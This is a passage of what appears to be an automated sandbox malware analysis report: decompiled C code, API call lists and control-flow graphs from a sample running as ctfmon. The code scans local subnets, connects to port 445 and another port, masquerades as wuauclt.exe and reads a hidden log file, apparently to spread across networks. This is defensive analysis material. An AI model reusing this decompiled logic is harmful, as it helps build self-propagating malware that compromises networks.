                                                					_t13 = _t31 + 1; // 0x1
                                                					_t54 = _t13;
                                                					do {
                                                						_t51 =  *_t31;
                                                						_t31 = _t31 + 1;
                                                					} while (_t51 != 0);
                                                					if(_t31 - _t54 > 4) {
                                                						E00975C70( &_v40, 0x20, _t59);
                                                						_t63 = _t63 + 0xc;
                                                					}
                                                					_push(0x2c);
                                                					E00970AA1(_t59);
                                                					_t63 = _t63 + 8;
                                                					_t70 = _t47;
                                                					if(_t47 == 0) {
                                                						goto L10;
                                                					} else {
                                                						goto L9;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00966D8D
                                                  • Part of subcall function 00966FE0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0096703C
                                                  • Part of subcall function 00966FE0: FindCloseChangeNotification.KERNELBASE(00000000), ref: 0096704C
                                                  • Part of subcall function 00966FE0: CreateDirectoryA.KERNELBASE(?,00000000), ref: 00967055
                                                  • Part of subcall function 00966FE0: DeleteFileA.KERNEL32(?), ref: 00967093
                                                • EnterCriticalSection.KERNEL32(00996A5C), ref: 00966DF9
                                                • LeaveCriticalSection.KERNEL32(00996A5C), ref: 00966E36
                                                • Sleep.KERNEL32(0000000A), ref: 00966E99
                                                • Sleep.KERNEL32(00000064), ref: 00966EA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CreateCriticalDirectoryFileSectionSleep$ChangeCloseDeleteEnterFindLeaveNotificationWindows
                                                • String ID: %s\%s\$/LU5/$NetworkDistribution
                                                • API String ID: 2690460970-3291581938
                                                • Opcode ID: 31bda5d5b334f175bf78109b8b7e7411bc2dd7b2ab40fa6b33a33d7db5362021
                                                • Instruction ID: b1262a175c9738dff041d3bec5b8b43bf018eed38ccc666cabcaa53e1133c3fc
                                                • Opcode Fuzzy Hash: 31bda5d5b334f175bf78109b8b7e7411bc2dd7b2ab40fa6b33a33d7db5362021
                                                • Instruction Fuzzy Hash: 07314B71E40318ABEB11EBB4DC56FDE73B8EF85704F504054F544B7291EBB2AA4887A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph (node: address range, calls, successors)
                                                • 287: 96b320-96b345 (socket) -> 288, 289
                                                • 288: 96b347-96b37a (inet_addr, htons, connect) -> 290, 291
                                                • 289: 96b382-96b393 (call 970a5d)
                                                • 290: 96b394-96b3a1 (closesocket, call 96b290) -> 295
                                                • 291: 96b37c (closesocket) -> 289
                                                • 295: 96b3a6-96b3a8 -> 289, 296
                                                • 296: 96b3aa-96b3bb (call 970a5d)
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0096B33A
                                                • inet_addr.WS2_32(?), ref: 0096B351
                                                • htons.WS2_32(000001BD), ref: 0096B35F
                                                • connect.WS2_32(00000000,?,00000010), ref: 0096B370
                                                • closesocket.WS2_32(00000000), ref: 0096B37C
                                                • closesocket.WS2_32(00000000), ref: 0096B394
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID: /LU5/
                                                • API String ID: 279130052-937868281
                                                • Opcode ID: e84a62f949c1e589f23d4fedc06fc669fcb384906958c29dcbe20c5492f1a18c
                                                • Instruction ID: d39447f1fd87dc155638687a17206c7e66cfffd6f1d039d78b0ad61d2e9899d7
                                                • Opcode Fuzzy Hash: e84a62f949c1e589f23d4fedc06fc669fcb384906958c29dcbe20c5492f1a18c
                                                • Instruction Fuzzy Hash: C111A535A112089BCB10AFB4AD09AEEB7A4EF85320F110259E8259B3D1EF714D459791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph (node: address range, calls, successors)
                                                • 299: 96b290-96b2b8 (socket) -> 300, 301
                                                • 300: 96b2f1-96b303 (call 970a5d)
                                                • 301: 96b2ba-96b2e9 (inet_addr, htons, connect) -> 302, 303
                                                • 302: 96b304-96b31c (closesocket, call 970a5d)
                                                • 303: 96b2eb (closesocket) -> 300
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0096B2AD
                                                • inet_addr.WS2_32(?), ref: 0096B2C4
                                                • htons.WS2_32(0000DEFC), ref: 0096B2CE
                                                • connect.WS2_32(00000000,?,00000010), ref: 0096B2DF
                                                • closesocket.WS2_32(00000000), ref: 0096B2EB
                                                • closesocket.WS2_32(00000000), ref: 0096B304
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID: /LU5/
                                                • API String ID: 279130052-937868281
                                                • Opcode ID: d6a31c64db3273614dbbc7d01828ba15e35253820b2cb0e637ff2804e5fca65f
                                                • Instruction ID: 7ab5782f064971199b78f55c05c44d29a0871b1ba2c8aea9bcc55fb07c65afbb
                                                • Opcode Fuzzy Hash: d6a31c64db3273614dbbc7d01828ba15e35253820b2cb0e637ff2804e5fca65f
                                                • Instruction Fuzzy Hash: BB01C835A11208ABCB10AFB8AC49AEEB7B8FF89321F110269F925D7391DB314D049790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 82%
                                                			E00964AC0(void* __ecx, intOrPtr __edx, void** _a4, long* _a8) {
                                                				void* _v8;
                                                				long _v12;
                                                				signed int _v16;
                                                				char _v20;
                                                				intOrPtr _v24;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t44;
                                                				long _t51;
                                                				void* _t52;
                                                				long _t61;
                                                				long _t62;
                                                				void* _t63;
                                                				long _t66;
                                                				void* _t78;
                                                				void* _t79;
                                                				long* _t80;
                                                				long _t87;
                                                				intOrPtr _t89;
                                                				intOrPtr* _t90;
                                                				void* _t92;
                                                				void* _t93;
                                                
                                                				_v24 = __edx;
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_t44 = E009649E0( &_v8,  &_v12); // executed
                                                				_t93 = _t92 + 4;
                                                				if(_t44 != 0) {
                                                					_t87 = _v12;
                                                					_t78 = 0;
                                                					_v16 = 0;
                                                					__eflags = _t87;
                                                					if(__eflags <= 0) {
                                                						L10:
                                                						LocalFree(_v8); // executed
                                                						return _v16;
                                                					} else {
                                                						while(1) {
                                                							_t90 = E00970A6E(_t90, __eflags, 0x58);
                                                							_v20 = _t90;
                                                							_v20 = _t90;
                                                							E00973440(_t87, _t90, 0, 0x58);
                                                							_t93 = _t93 + 0x10;
                                                							asm("movups xmm0, [ebx+eax]");
                                                							asm("movups [esi], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x10]");
                                                							asm("movups [esi+0x10], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x20]");
                                                							asm("movups [esi+0x20], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x30]");
                                                							asm("movups [esi+0x30], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x40]");
                                                							_t79 = _t78 + 0x50;
                                                							asm("movups [esi+0x40], xmm0");
                                                							__eflags =  *_t90 - _v24;
                                                							if( *_t90 == _v24) {
                                                								break;
                                                							}
                                                							_t78 = _t79 +  *(_t90 + 0x38) +  *(_t90 + 0xc);
                                                							__eflags = _t78 - _t87;
                                                							if(__eflags < 0) {
                                                								continue;
                                                							} else {
                                                								LocalFree(_v8);
                                                								return _v16;
                                                							}
                                                							goto L11;
                                                						}
                                                						_t51 =  *(_t90 + 0xc);
                                                						_v12 = _t51;
                                                						_t52 = LocalAlloc(0x40, _t51); // executed
                                                						 *(_t90 + 0x50) = _t52;
                                                						 *((intOrPtr*)(_t90 + 0x54)) = LocalAlloc(0x40,  *(_t90 + 0x38));
                                                						E00983DB0( *(_t90 + 0x50), _v8 + _t79, _v12);
                                                						E00983DB0( *((intOrPtr*)(_t90 + 0x54)), _v12 + _t79 + _v8,  *(_t90 + 0x38));
                                                						_t61 = E009648B0( &_v20);
                                                						__eflags = _t61;
                                                						if(_t61 == 0) {
                                                							goto L10;
                                                						} else {
                                                							_t89 = _v20;
                                                							_t80 = _a8;
                                                							_t62 =  *(_t89 + 8);
                                                							 *_t80 = _t62; // executed
                                                							_t63 = LocalAlloc(0x40, _t62); // executed
                                                							 *_a4 = _t63;
                                                							E00973440(_t89, _t63, 0,  *(_t89 + 8));
                                                							_t66 = E00961000(_t63, _t80,  *((intOrPtr*)(_t89 + 0x50)), _v12);
                                                							__eflags = _t66;
                                                							if(_t66 == 0) {
                                                								__eflags =  *_t80 -  *(_t89 + 8);
                                                								_t69 =  ==  ? 1 : _v16 & 0x000000ff;
                                                								_v16 =  ==  ? 1 : _v16 & 0x000000ff;
                                                								goto L10;
                                                							} else {
                                                								LocalFree( *_a4);
                                                								LocalFree(_v8);
                                                								return _v16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t44;
                                                				}
                                                				L11:
                                                			}

                                                APIs
                                                  • Part of subcall function 009649E0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,00964AE6,?), ref: 00964A03
                                                  • Part of subcall function 009649E0: GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 00964A23
                                                  • Part of subcall function 009649E0: LocalAlloc.KERNELBASE(00000040,00000000,?,73B76490), ref: 00964A32
                                                  • Part of subcall function 009649E0: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964A42
                                                • new.LIBCMT ref: 00964B07
                                                • LocalFree.KERNEL32(00000000), ref: 00964B6B
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID:
                                                • API String ID: 1503672127-0
                                                • Opcode ID: 66d7f441d90b28fe5b5294ba54f762111809bba8c50472d80dcdb8fabd15e046
                                                • Instruction ID: b22dd6222fcaa726b34376caf49e8da2995c2a1801102815b71e8b1dc92ac2e1
                                                • Opcode Fuzzy Hash: 66d7f441d90b28fe5b5294ba54f762111809bba8c50472d80dcdb8fabd15e046
                                                • Instruction Fuzzy Hash: DF51C471D04704ABDB11DFA8DD45BEEBBB4FF48318F044594EE88A7212E731AA94DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E0096AFC0() {
                                                				void* __edi;
                                                				void* _t7;
                                                				void* _t9;
                                                				signed int _t14;
                                                				signed int _t15;
                                                				void* _t18;
                                                				void* _t19;
                                                
                                                				Sleep(0xbb8); // executed
                                                				_t7 = 0;
                                                				do {
                                                					_t1 = _t7 + L"wuauclt.exe"; // 0x750077
                                                					_t14 =  *_t1 & 0x0000ffff;
                                                					_t7 = _t7 + 2;
                                                					 *(_t7 + 0x996836) = _t14;
                                                					_t22 = _t14;
                                                				} while (_t14 != 0);
                                                				E00969D90(_t22);
                                                				_t9 = E0096AE20(_t14, _t18, _t22);
                                                				if(_t9 != 0) {
                                                					while(1) {
                                                						L4:
                                                						EnterCriticalSection(0x995bfc);
                                                						_t15 =  *0x995c18;
                                                						if(_t15 == 0) {
                                                							break;
                                                						}
                                                						_t19 =  *( *0x995c14 + _t15 * 4 - 4);
                                                						 *0x995c18 = _t15 - 1;
                                                						E00966EF0(0x995bf8);
                                                						if(_t19 != 0) {
                                                							CreateThread(0, 0, E0096AD60, _t19, 0, 0);
                                                						}
                                                						LeaveCriticalSection(0x995bfc);
                                                						Sleep(0x64);
                                                					}
                                                					LeaveCriticalSection(0x995bfc);
                                                					Sleep(0xbb8);
                                                					Sleep(0x64);
                                                					goto L4;
                                                				}
                                                				return _t9;
                                                			}











                                                APIs
                                                • Sleep.KERNELBASE(00000BB8), ref: 0096AFCE
                                                • EnterCriticalSection.KERNEL32(00995BFC), ref: 0096B005
                                                • CreateThread.KERNEL32(00000000,00000000,0096AD60,?,00000000,00000000), ref: 0096B041
                                                • LeaveCriticalSection.KERNEL32(00995BFC), ref: 0096B04C
                                                • Sleep.KERNEL32(00000064), ref: 0096B050
                                                • LeaveCriticalSection.KERNEL32(00995BFC), ref: 0096B059
                                                • Sleep.KERNEL32(00000BB8), ref: 0096B060
                                                • Sleep.KERNEL32(00000064), ref: 0096B064
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Sleep$CriticalSection$Leave$CreateEnterThread
                                                • String ID:
                                                • API String ID: 2546236395-0
                                                • Opcode ID: 7eb589b385daf2799637463965b82113fa5d94308b984037f50f204705be7e2c
                                                • Instruction ID: 85383c79b9625e3234344c12a4467cfc9c7acf818e80f9f02ed248c2267dbac4
                                                • Opcode Fuzzy Hash: 7eb589b385daf2799637463965b82113fa5d94308b984037f50f204705be7e2c
                                                • Instruction Fuzzy Hash: 8E01D6347587089BD6217F9C9D45F6E3B54EF84B44F16005AB608AB2D0EBA158C49BB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 473 967c20-967c4d 474 967c53-967c8c call 973440 gethostname gethostbyname 473->474 477 967c97-967cb4 474->477 478 967c8e-967c95 Sleep 474->478 479 967ddf-967de6 Sleep 477->479 480 967cba-967cbc 477->480 478->474 479->474 481 967cc0-967d16 call 965180 480->481 484 967d1c-967d1f 481->484 485 967d18-967d1a 481->485 487 967d22-967d27 484->487 486 967d2b-967d64 call 965a00 call 967df0 485->486 493 967d66-967d6e call 965cf0 486->493 494 967d73-967d98 call 96b4e0 486->494 487->487 488 967d29 487->488 488->486 493->494 497 967d9d-967dac 494->497 498 967dae-967dd3 497->498 499 967dd9 497->499 498->481 498->499 499->479
                                                C-Code - Quality: 63%
                                                			E00967C20() {
                                                				char _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v21;
                                                				short _v23;
                                                				char _v27;
                                                				char _v52;
                                                				char _v308;
                                                				intOrPtr _v312;
                                                				char _v316;
                                                				char _v332;
                                                				signed int _v336;
                                                				signed int _t43;
                                                				signed int _t44;
                                                				intOrPtr* _t50;
                                                				signed char* _t52;
                                                				signed int _t53;
                                                				intOrPtr* _t56;
                                                				void* _t57;
                                                				intOrPtr* _t61;
                                                				signed int _t67;
                                                				signed char* _t68;
                                                				void* _t71;
                                                				intOrPtr _t73;
                                                				signed char** _t77;
                                                				signed int _t78;
                                                				void* _t81;
                                                				signed int _t82;
                                                				intOrPtr* _t84;
                                                				signed int _t85;
                                                				void* _t86;
                                                				void* _t87;
                                                				void* _t88;
                                                
                                                				_push(0xffffffff);
                                                				_push(E0098467B);
                                                				_push( *[fs:0x0]);
                                                				_t87 = _t86 - 0x140;
                                                				_t43 =  *0x98f008; // 0x35554c2f
                                                				_t44 = _t43 ^ _t85;
                                                				_v20 = _t44;
                                                				_push(_t44);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t81 = Sleep;
                                                				while(1) {
                                                					L1:
                                                					E00973440(_t81,  &_v308, 0, 0x100);
                                                					_t87 = _t87 + 0xc;
                                                					gethostname( &_v308, 0x100); // executed
                                                					_t50 =  &_v308;
                                                					__imp__#52(_t50); // executed
                                                					_t84 = _t50;
                                                					if(_t84 == 0) {
                                                						break;
                                                					}
                                                					_v336 = 0;
                                                					_t52 =  *( *(_t84 + 0xc));
                                                					_t72 =  *_t52 & 0x000000ff;
                                                					_t78 = _t52[1] & 0x000000ff;
                                                					_t53 = _t52[2] & 0x000000ff;
                                                					if(( *_t52 & 0x000000ff) == 0x7f) {
                                                						L15:
                                                						Sleep(0xdbba0); // executed
                                                						continue;
                                                					}
                                                					_t82 = 0;
                                                					do {
                                                						_push(_t53);
                                                						_push(_t78);
                                                						asm("xorps xmm0, xmm0");
                                                						_v52 = 0;
                                                						asm("movq [ebp-0x1f], xmm0");
                                                						asm("movups [ebp-0x2f], xmm0");
                                                						_v27 = 0;
                                                						_v23 = 0;
                                                						_v21 = 0;
                                                						E00965180( &_v52, 0x20, "%d.%d.%d.*", _t72);
                                                						_t88 = _t87 + 0x18;
                                                						_v312 = 0xf;
                                                						_v316 = 0;
                                                						_v332 = 0;
                                                						if(_v52 != 0) {
                                                							_t56 =  &_v52;
                                                							_t20 = _t56 + 1; // 0x1
                                                							_t78 = _t20;
                                                							do {
                                                								_t73 =  *_t56;
                                                								_t56 = _t56 + 1;
                                                							} while (_t73 != 0);
                                                							_t57 = _t56 - _t78;
                                                							L10:
                                                							_push(_t57);
                                                							_push( &_v52);
                                                							E00965A00(_t71,  &_v332, _t82, _t84);
                                                							_v8 = 0;
                                                							_t61 = E00967DF0( &_v332,  &_v332);
                                                							_v8 = 0xffffffff;
                                                							 *_t61 = 0;
                                                							_t62 = _v312;
                                                							if(_v312 >= 0x10) {
                                                								E00965CF0(_t71, _t78, _t82, _v332, _t62 + 1);
                                                							}
                                                							_v312 = 0xf;
                                                							_v316 = 0;
                                                							_v332 = 0;
                                                							E0096B4E0(_t71,  *((intOrPtr*)( *(_t84 + 0xc) + _t82)), 1, _t82, 0); // executed
                                                							_t77 =  *(_t84 + 0xc);
                                                							_t87 = _t88 + 4;
                                                							if( *((short*)(_t84 + 0xa)) +  *(_t77 + _t82) >=  *_t84) {
                                                								break;
                                                							} else {
                                                								goto L13;
                                                							}
                                                						}
                                                						_t57 = 0;
                                                						goto L10;
                                                						L13:
                                                						_t67 = _v336 + 1;
                                                						_v336 = _t67;
                                                						_t82 = _t67 * 4;
                                                						_t68 =  *(_t77 + _t82);
                                                						_t72 =  *_t68 & 0x000000ff;
                                                						_t78 = _t68[1] & 0x000000ff;
                                                						_t53 = _t68[2] & 0x000000ff;
                                                					} while (( *_t68 & 0x000000ff) != 0x7f);
                                                					_t81 = Sleep;
                                                					goto L15;
                                                				}
                                                				Sleep(0x2bf20);
                                                				goto L1;
                                                			}





































                                                APIs
                                                • gethostname.WS2_32(?,00000100), ref: 00967C75
                                                • gethostbyname.WS2_32(?), ref: 00967C82
                                                • Sleep.KERNEL32(0002BF20), ref: 00967C93
                                                • Sleep.KERNELBASE(000DBBA0), ref: 00967DE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Sleep$gethostbynamegethostname
                                                • String ID: %d.%d.%d.*$/LU5/
                                                • API String ID: 3714389383-1555885800
                                                • Opcode ID: b668135e008c76a3d051023d8fadb003a9f389f0de56b1db322d9edc625c968b
                                                • Instruction ID: dfadb4d295061ca3ae512c075524f1d0b212be8952099cdd5b9a6c254085ea13
                                                • Opcode Fuzzy Hash: b668135e008c76a3d051023d8fadb003a9f389f0de56b1db322d9edc625c968b
                                                • Instruction Fuzzy Hash: 635102708082589FDB21DFA4CC94BFEBBB8FF05308F144599E459AB291DB74AA44CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 500 96b4e0-96b4f8 501 96b646-96b654 call 970a5d 500->501 502 96b4fe-96b501 500->502 502->501 504 96b507-96b519 EnterCriticalSection 502->504 506 96b520-96b524 504->506 507 96b526-96b52c 506->507 508 96b532-96b57b call 965180 506->508 507->508 509 96b62c-96b633 507->509 513 96b57d-96b580 508->513 514 96b5da-96b5dc call 970a6e 508->514 509->506 512 96b639-96b645 LeaveCriticalSection 509->512 512->501 513->509 515 96b586-96b5c2 call 970a6e call 975c70 call 966f70 513->515 518 96b5e1-96b616 call 975c70 call 966f70 514->518 515->509 529 96b5c4-96b5d8 515->529 518->509 527 96b618-96b626 518->527 527->509 529->509
                                                C-Code - Quality: 76%
                                                			E0096B4E0(void* __ebx, signed char* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v9;
                                                				short _v11;
                                                				char _v15;
                                                				char _v40;
                                                				char _v41;
                                                				intOrPtr _v48;
                                                				void* __esi;
                                                				signed int _t28;
                                                				intOrPtr _t37;
                                                				intOrPtr _t38;
                                                				signed char* _t51;
                                                				intOrPtr _t61;
                                                				intOrPtr _t63;
                                                				signed int _t64;
                                                				void* _t65;
                                                
                                                				_t28 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t28 ^ _t64;
                                                				_t51 = __ecx;
                                                				_v41 = __edx;
                                                				if(__ecx == 0 ||  *((char*)(__ecx)) == 0x7f) {
                                                					L13:
                                                					return E00970A5D(_v8 ^ _t64, _t63);
                                                				} else {
                                                					_push(_t63);
                                                					EnterCriticalSection(0x996a74);
                                                					_t61 = 1;
                                                					do {
                                                						if(_v41 == 0 || _t61 != (_t51[3] & 0x000000ff)) {
                                                							asm("xorps xmm0, xmm0");
                                                							_push(_t61);
                                                							_push(_t51[2] & 0x000000ff);
                                                							_push(_t51[1] & 0x000000ff);
                                                							_v40 = 0;
                                                							asm("movups [ebp-0x23], xmm0");
                                                							_v15 = 0;
                                                							asm("movq [ebp-0x13], xmm0");
                                                							_v11 = 0;
                                                							_v9 = 0;
                                                							E00965180( &_v40, 0x20, "%d.%d.%d.%d",  *_t51 & 0x000000ff);
                                                							_t65 = _t65 + 0x1c;
                                                							_t37 = _a4;
                                                							if(_t37 == 0) {
                                                								_t38 = E00970A6E(_t63, __eflags, 0x2c); // executed
                                                								_t63 = _t38;
                                                								_v48 = _t63;
                                                								E00975C70(_t63, 0x20,  &_v40);
                                                								_t65 = _t65 + 0x10;
                                                								 *((intOrPtr*)(_t63 + 0x20)) = 0;
                                                								 *((intOrPtr*)(_t63 + 0x24)) = 0;
                                                								 *((intOrPtr*)(_t63 + 0x28)) = 0;
                                                								__eflags = E00966F70(0x995c48);
                                                								if(__eflags != 0) {
                                                									 *((intOrPtr*)( *0x995c64 +  *0x995c68 * 4)) = _t63;
                                                									 *0x995c68 =  *0x995c68 + 1;
                                                									__eflags =  *0x995c68;
                                                								}
                                                							} else {
                                                								_t71 = _t37 == 1;
                                                								if(_t37 == 1) {
                                                									_t63 = E00970A6E(_t63, _t71, 0x2c);
                                                									_v48 = _t63;
                                                									E00975C70(_t63, 0x20,  &_v40);
                                                									_t65 = _t65 + 0x10;
                                                									 *((intOrPtr*)(_t63 + 0x20)) = 0;
                                                									 *((intOrPtr*)(_t63 + 0x24)) = 0;
                                                									 *((intOrPtr*)(_t63 + 0x28)) = 1;
                                                									if(E00966F70(0x995c20) != 0) {
                                                										 *((intOrPtr*)( *0x995c3c +  *0x995c40 * 4)) = _t63;
                                                										 *0x995c40 =  *0x995c40 + 1;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						_t61 = _t61 + 1;
                                                					} while (_t61 <= 0xff);
                                                					LeaveCriticalSection(0x996a74);
                                                					_pop(_t63);
                                                					goto L13;
                                                				}
                                                			}




















                                                APIs
                                                • EnterCriticalSection.KERNEL32(00996A74,00000000,00000000,?,?,?,?,?,?,?,00967D9D,00000000,00000000,00000000,00000001), ref: 0096B50E
                                                • new.LIBCMT ref: 0096B588
                                                • new.LIBCMT ref: 0096B5DC
                                                • LeaveCriticalSection.KERNEL32(00996A74), ref: 0096B63E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID: %d.%d.%d.%d$/LU5/
                                                • API String ID: 3168844106-734770965
                                                • Opcode ID: e717c1fe61c65f5ff367be30b391785264edf4011f5ee733d374cd0604308d33
                                                • Instruction ID: e189f073896492c888d126fb992865d8d7980e5b40be69577900ad065807c102
                                                • Opcode Fuzzy Hash: e717c1fe61c65f5ff367be30b391785264edf4011f5ee733d374cd0604308d33
                                                • Instruction Fuzzy Hash: AF412971D047049BE721DF68D845BBF7BF8EF4A300F050199F885AB282E7759944DBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0096FB00(CHAR* __ecx, void* __edx) {
                                                				intOrPtr _v0;
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v268;
                                                				char _v271;
                                                				char _v272;
                                                				char _v528;
                                                				char _v532;
                                                				struct _FILETIME _v548;
                                                				struct _FILETIME _v556;
                                                				struct _FILETIME _v564;
                                                				long _v568;
                                                				char _v832;
                                                				char _v833;
                                                				struct _OVERLAPPED* _v840;
                                                				long _v844;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t91;
                                                				void _t93;
                                                				void _t95;
                                                				void _t96;
                                                				char _t103;
                                                				signed int _t107;
                                                				signed int _t109;
                                                				signed int _t110;
                                                				signed int _t113;
                                                				char _t114;
                                                				void* _t116;
                                                				signed int _t124;
                                                				void* _t130;
                                                				long _t133;
                                                				signed int _t143;
                                                				void* _t144;
                                                				signed int _t153;
                                                				signed int _t158;
                                                				signed int _t160;
                                                				long _t166;
                                                				void* _t169;
                                                				signed int _t171;
                                                				char _t172;
                                                				signed int _t173;
                                                				void* _t175;
                                                				void* _t183;
                                                				signed int _t185;
                                                				void* _t191;
                                                				intOrPtr _t192;
                                                				char _t194;
                                                				signed int* _t195;
                                                				signed int _t198;
                                                				signed int* _t206;
                                                				char _t218;
                                                				void* _t226;
                                                				void* _t228;
                                                				void* _t234;
                                                				signed int* _t235;
                                                				signed int _t236;
                                                				CHAR* _t243;
                                                				void* _t244;
                                                				void* _t245;
                                                				signed int _t247;
                                                				signed int* _t248;
                                                				long _t250;
                                                				void* _t251;
                                                				void* _t252;
                                                				void* _t253;
                                                				signed int _t254;
                                                				signed int _t256;
                                                				signed int _t258;
                                                				signed int _t263;
                                                				signed int _t264;
                                                				void* _t268;
                                                				void* _t270;
                                                
                                                				_t217 = __edx;
                                                				_t256 = _t263;
                                                				_t264 = _t263 - 0x20c;
                                                				_t91 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t91 ^ _t256;
                                                				_t243 = __ecx;
                                                				_t169 = __edx;
                                                				if(__ecx != 0) {
                                                					_t166 = GetFileAttributesA(__ecx); // executed
                                                					if(_t166 == 0xffffffff) {
                                                						CreateDirectoryA(_t243, 0);
                                                					}
                                                				}
                                                				_t93 =  *_t169;
                                                				if(_t93 == 0) {
                                                					L21:
                                                					_pop(_t244);
                                                					return E00970A5D(_v8 ^ _t256, _t244);
                                                				} else {
                                                					_t226 = _t169;
                                                					_t183 = _t169;
                                                					do {
                                                						if(_t93 == 0x2f || _t93 == 0x5c) {
                                                							_t226 = _t183;
                                                						}
                                                						_t93 =  *(_t183 + 1);
                                                						_t183 = _t183 + 1;
                                                					} while (_t93 != 0);
                                                					if(_t226 == _t169) {
                                                						L12:
                                                						_v268 = 0;
                                                						if(_t243 != 0) {
                                                							_t191 =  &_v268 - _t243;
                                                							do {
                                                								_t103 =  *_t243;
                                                								_t243 =  &(_t243[1]);
                                                								 *((char*)(_t191 + _t243 - 1)) = _t103;
                                                							} while (_t103 != 0);
                                                						}
                                                						_t245 = _t169;
                                                						do {
                                                							_t95 =  *_t169;
                                                							_t169 = _t169 + 1;
                                                						} while (_t95 != 0);
                                                						_t171 = _t169 - _t245;
                                                						_t228 =  &_v268 - 1;
                                                						do {
                                                							_t96 =  *(_t228 + 1);
                                                							_t228 = _t228 + 1;
                                                						} while (_t96 != 0);
                                                						_t185 = _t171 >> 2;
                                                						memcpy(_t228, _t245, _t185 << 2);
                                                						if(GetFileAttributesA(memcpy(_t245 + _t185 + _t185, _t245, _t171 & 0x00000003)) == 0xffffffff) {
                                                							CreateDirectoryA( &_v268, 0);
                                                						}
                                                						goto L21;
                                                					} else {
                                                						_t234 = _t226 - _t169;
                                                						E00983DB0( &_v528, _t169, _t234);
                                                						_t264 = _t264 + 0xc;
                                                						if(_t234 >= 0x104) {
                                                							E00970E90();
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							_push(_t256);
                                                							_t258 = _t264;
                                                							_t268 = _t264 - 0x344;
                                                							_t107 =  *0x98f008; // 0x35554c2f
                                                							_v548.dwLowDateTime = _t107 ^ _t258;
                                                							_push(_t169);
                                                							_t172 = _v532;
                                                							_push(_t234);
                                                							_t235 = _t183;
                                                							__eflags = _t235[1] - 0xffffffff;
                                                							if(_t235[1] != 0xffffffff) {
                                                								E0096F2D0( *_t235, _t217);
                                                							}
                                                							_t109 =  *_t235;
                                                							_t192 = _v0;
                                                							_t235[1] = 0xffffffff;
                                                							__eflags = _t192 -  *((intOrPtr*)(_t109 + 4));
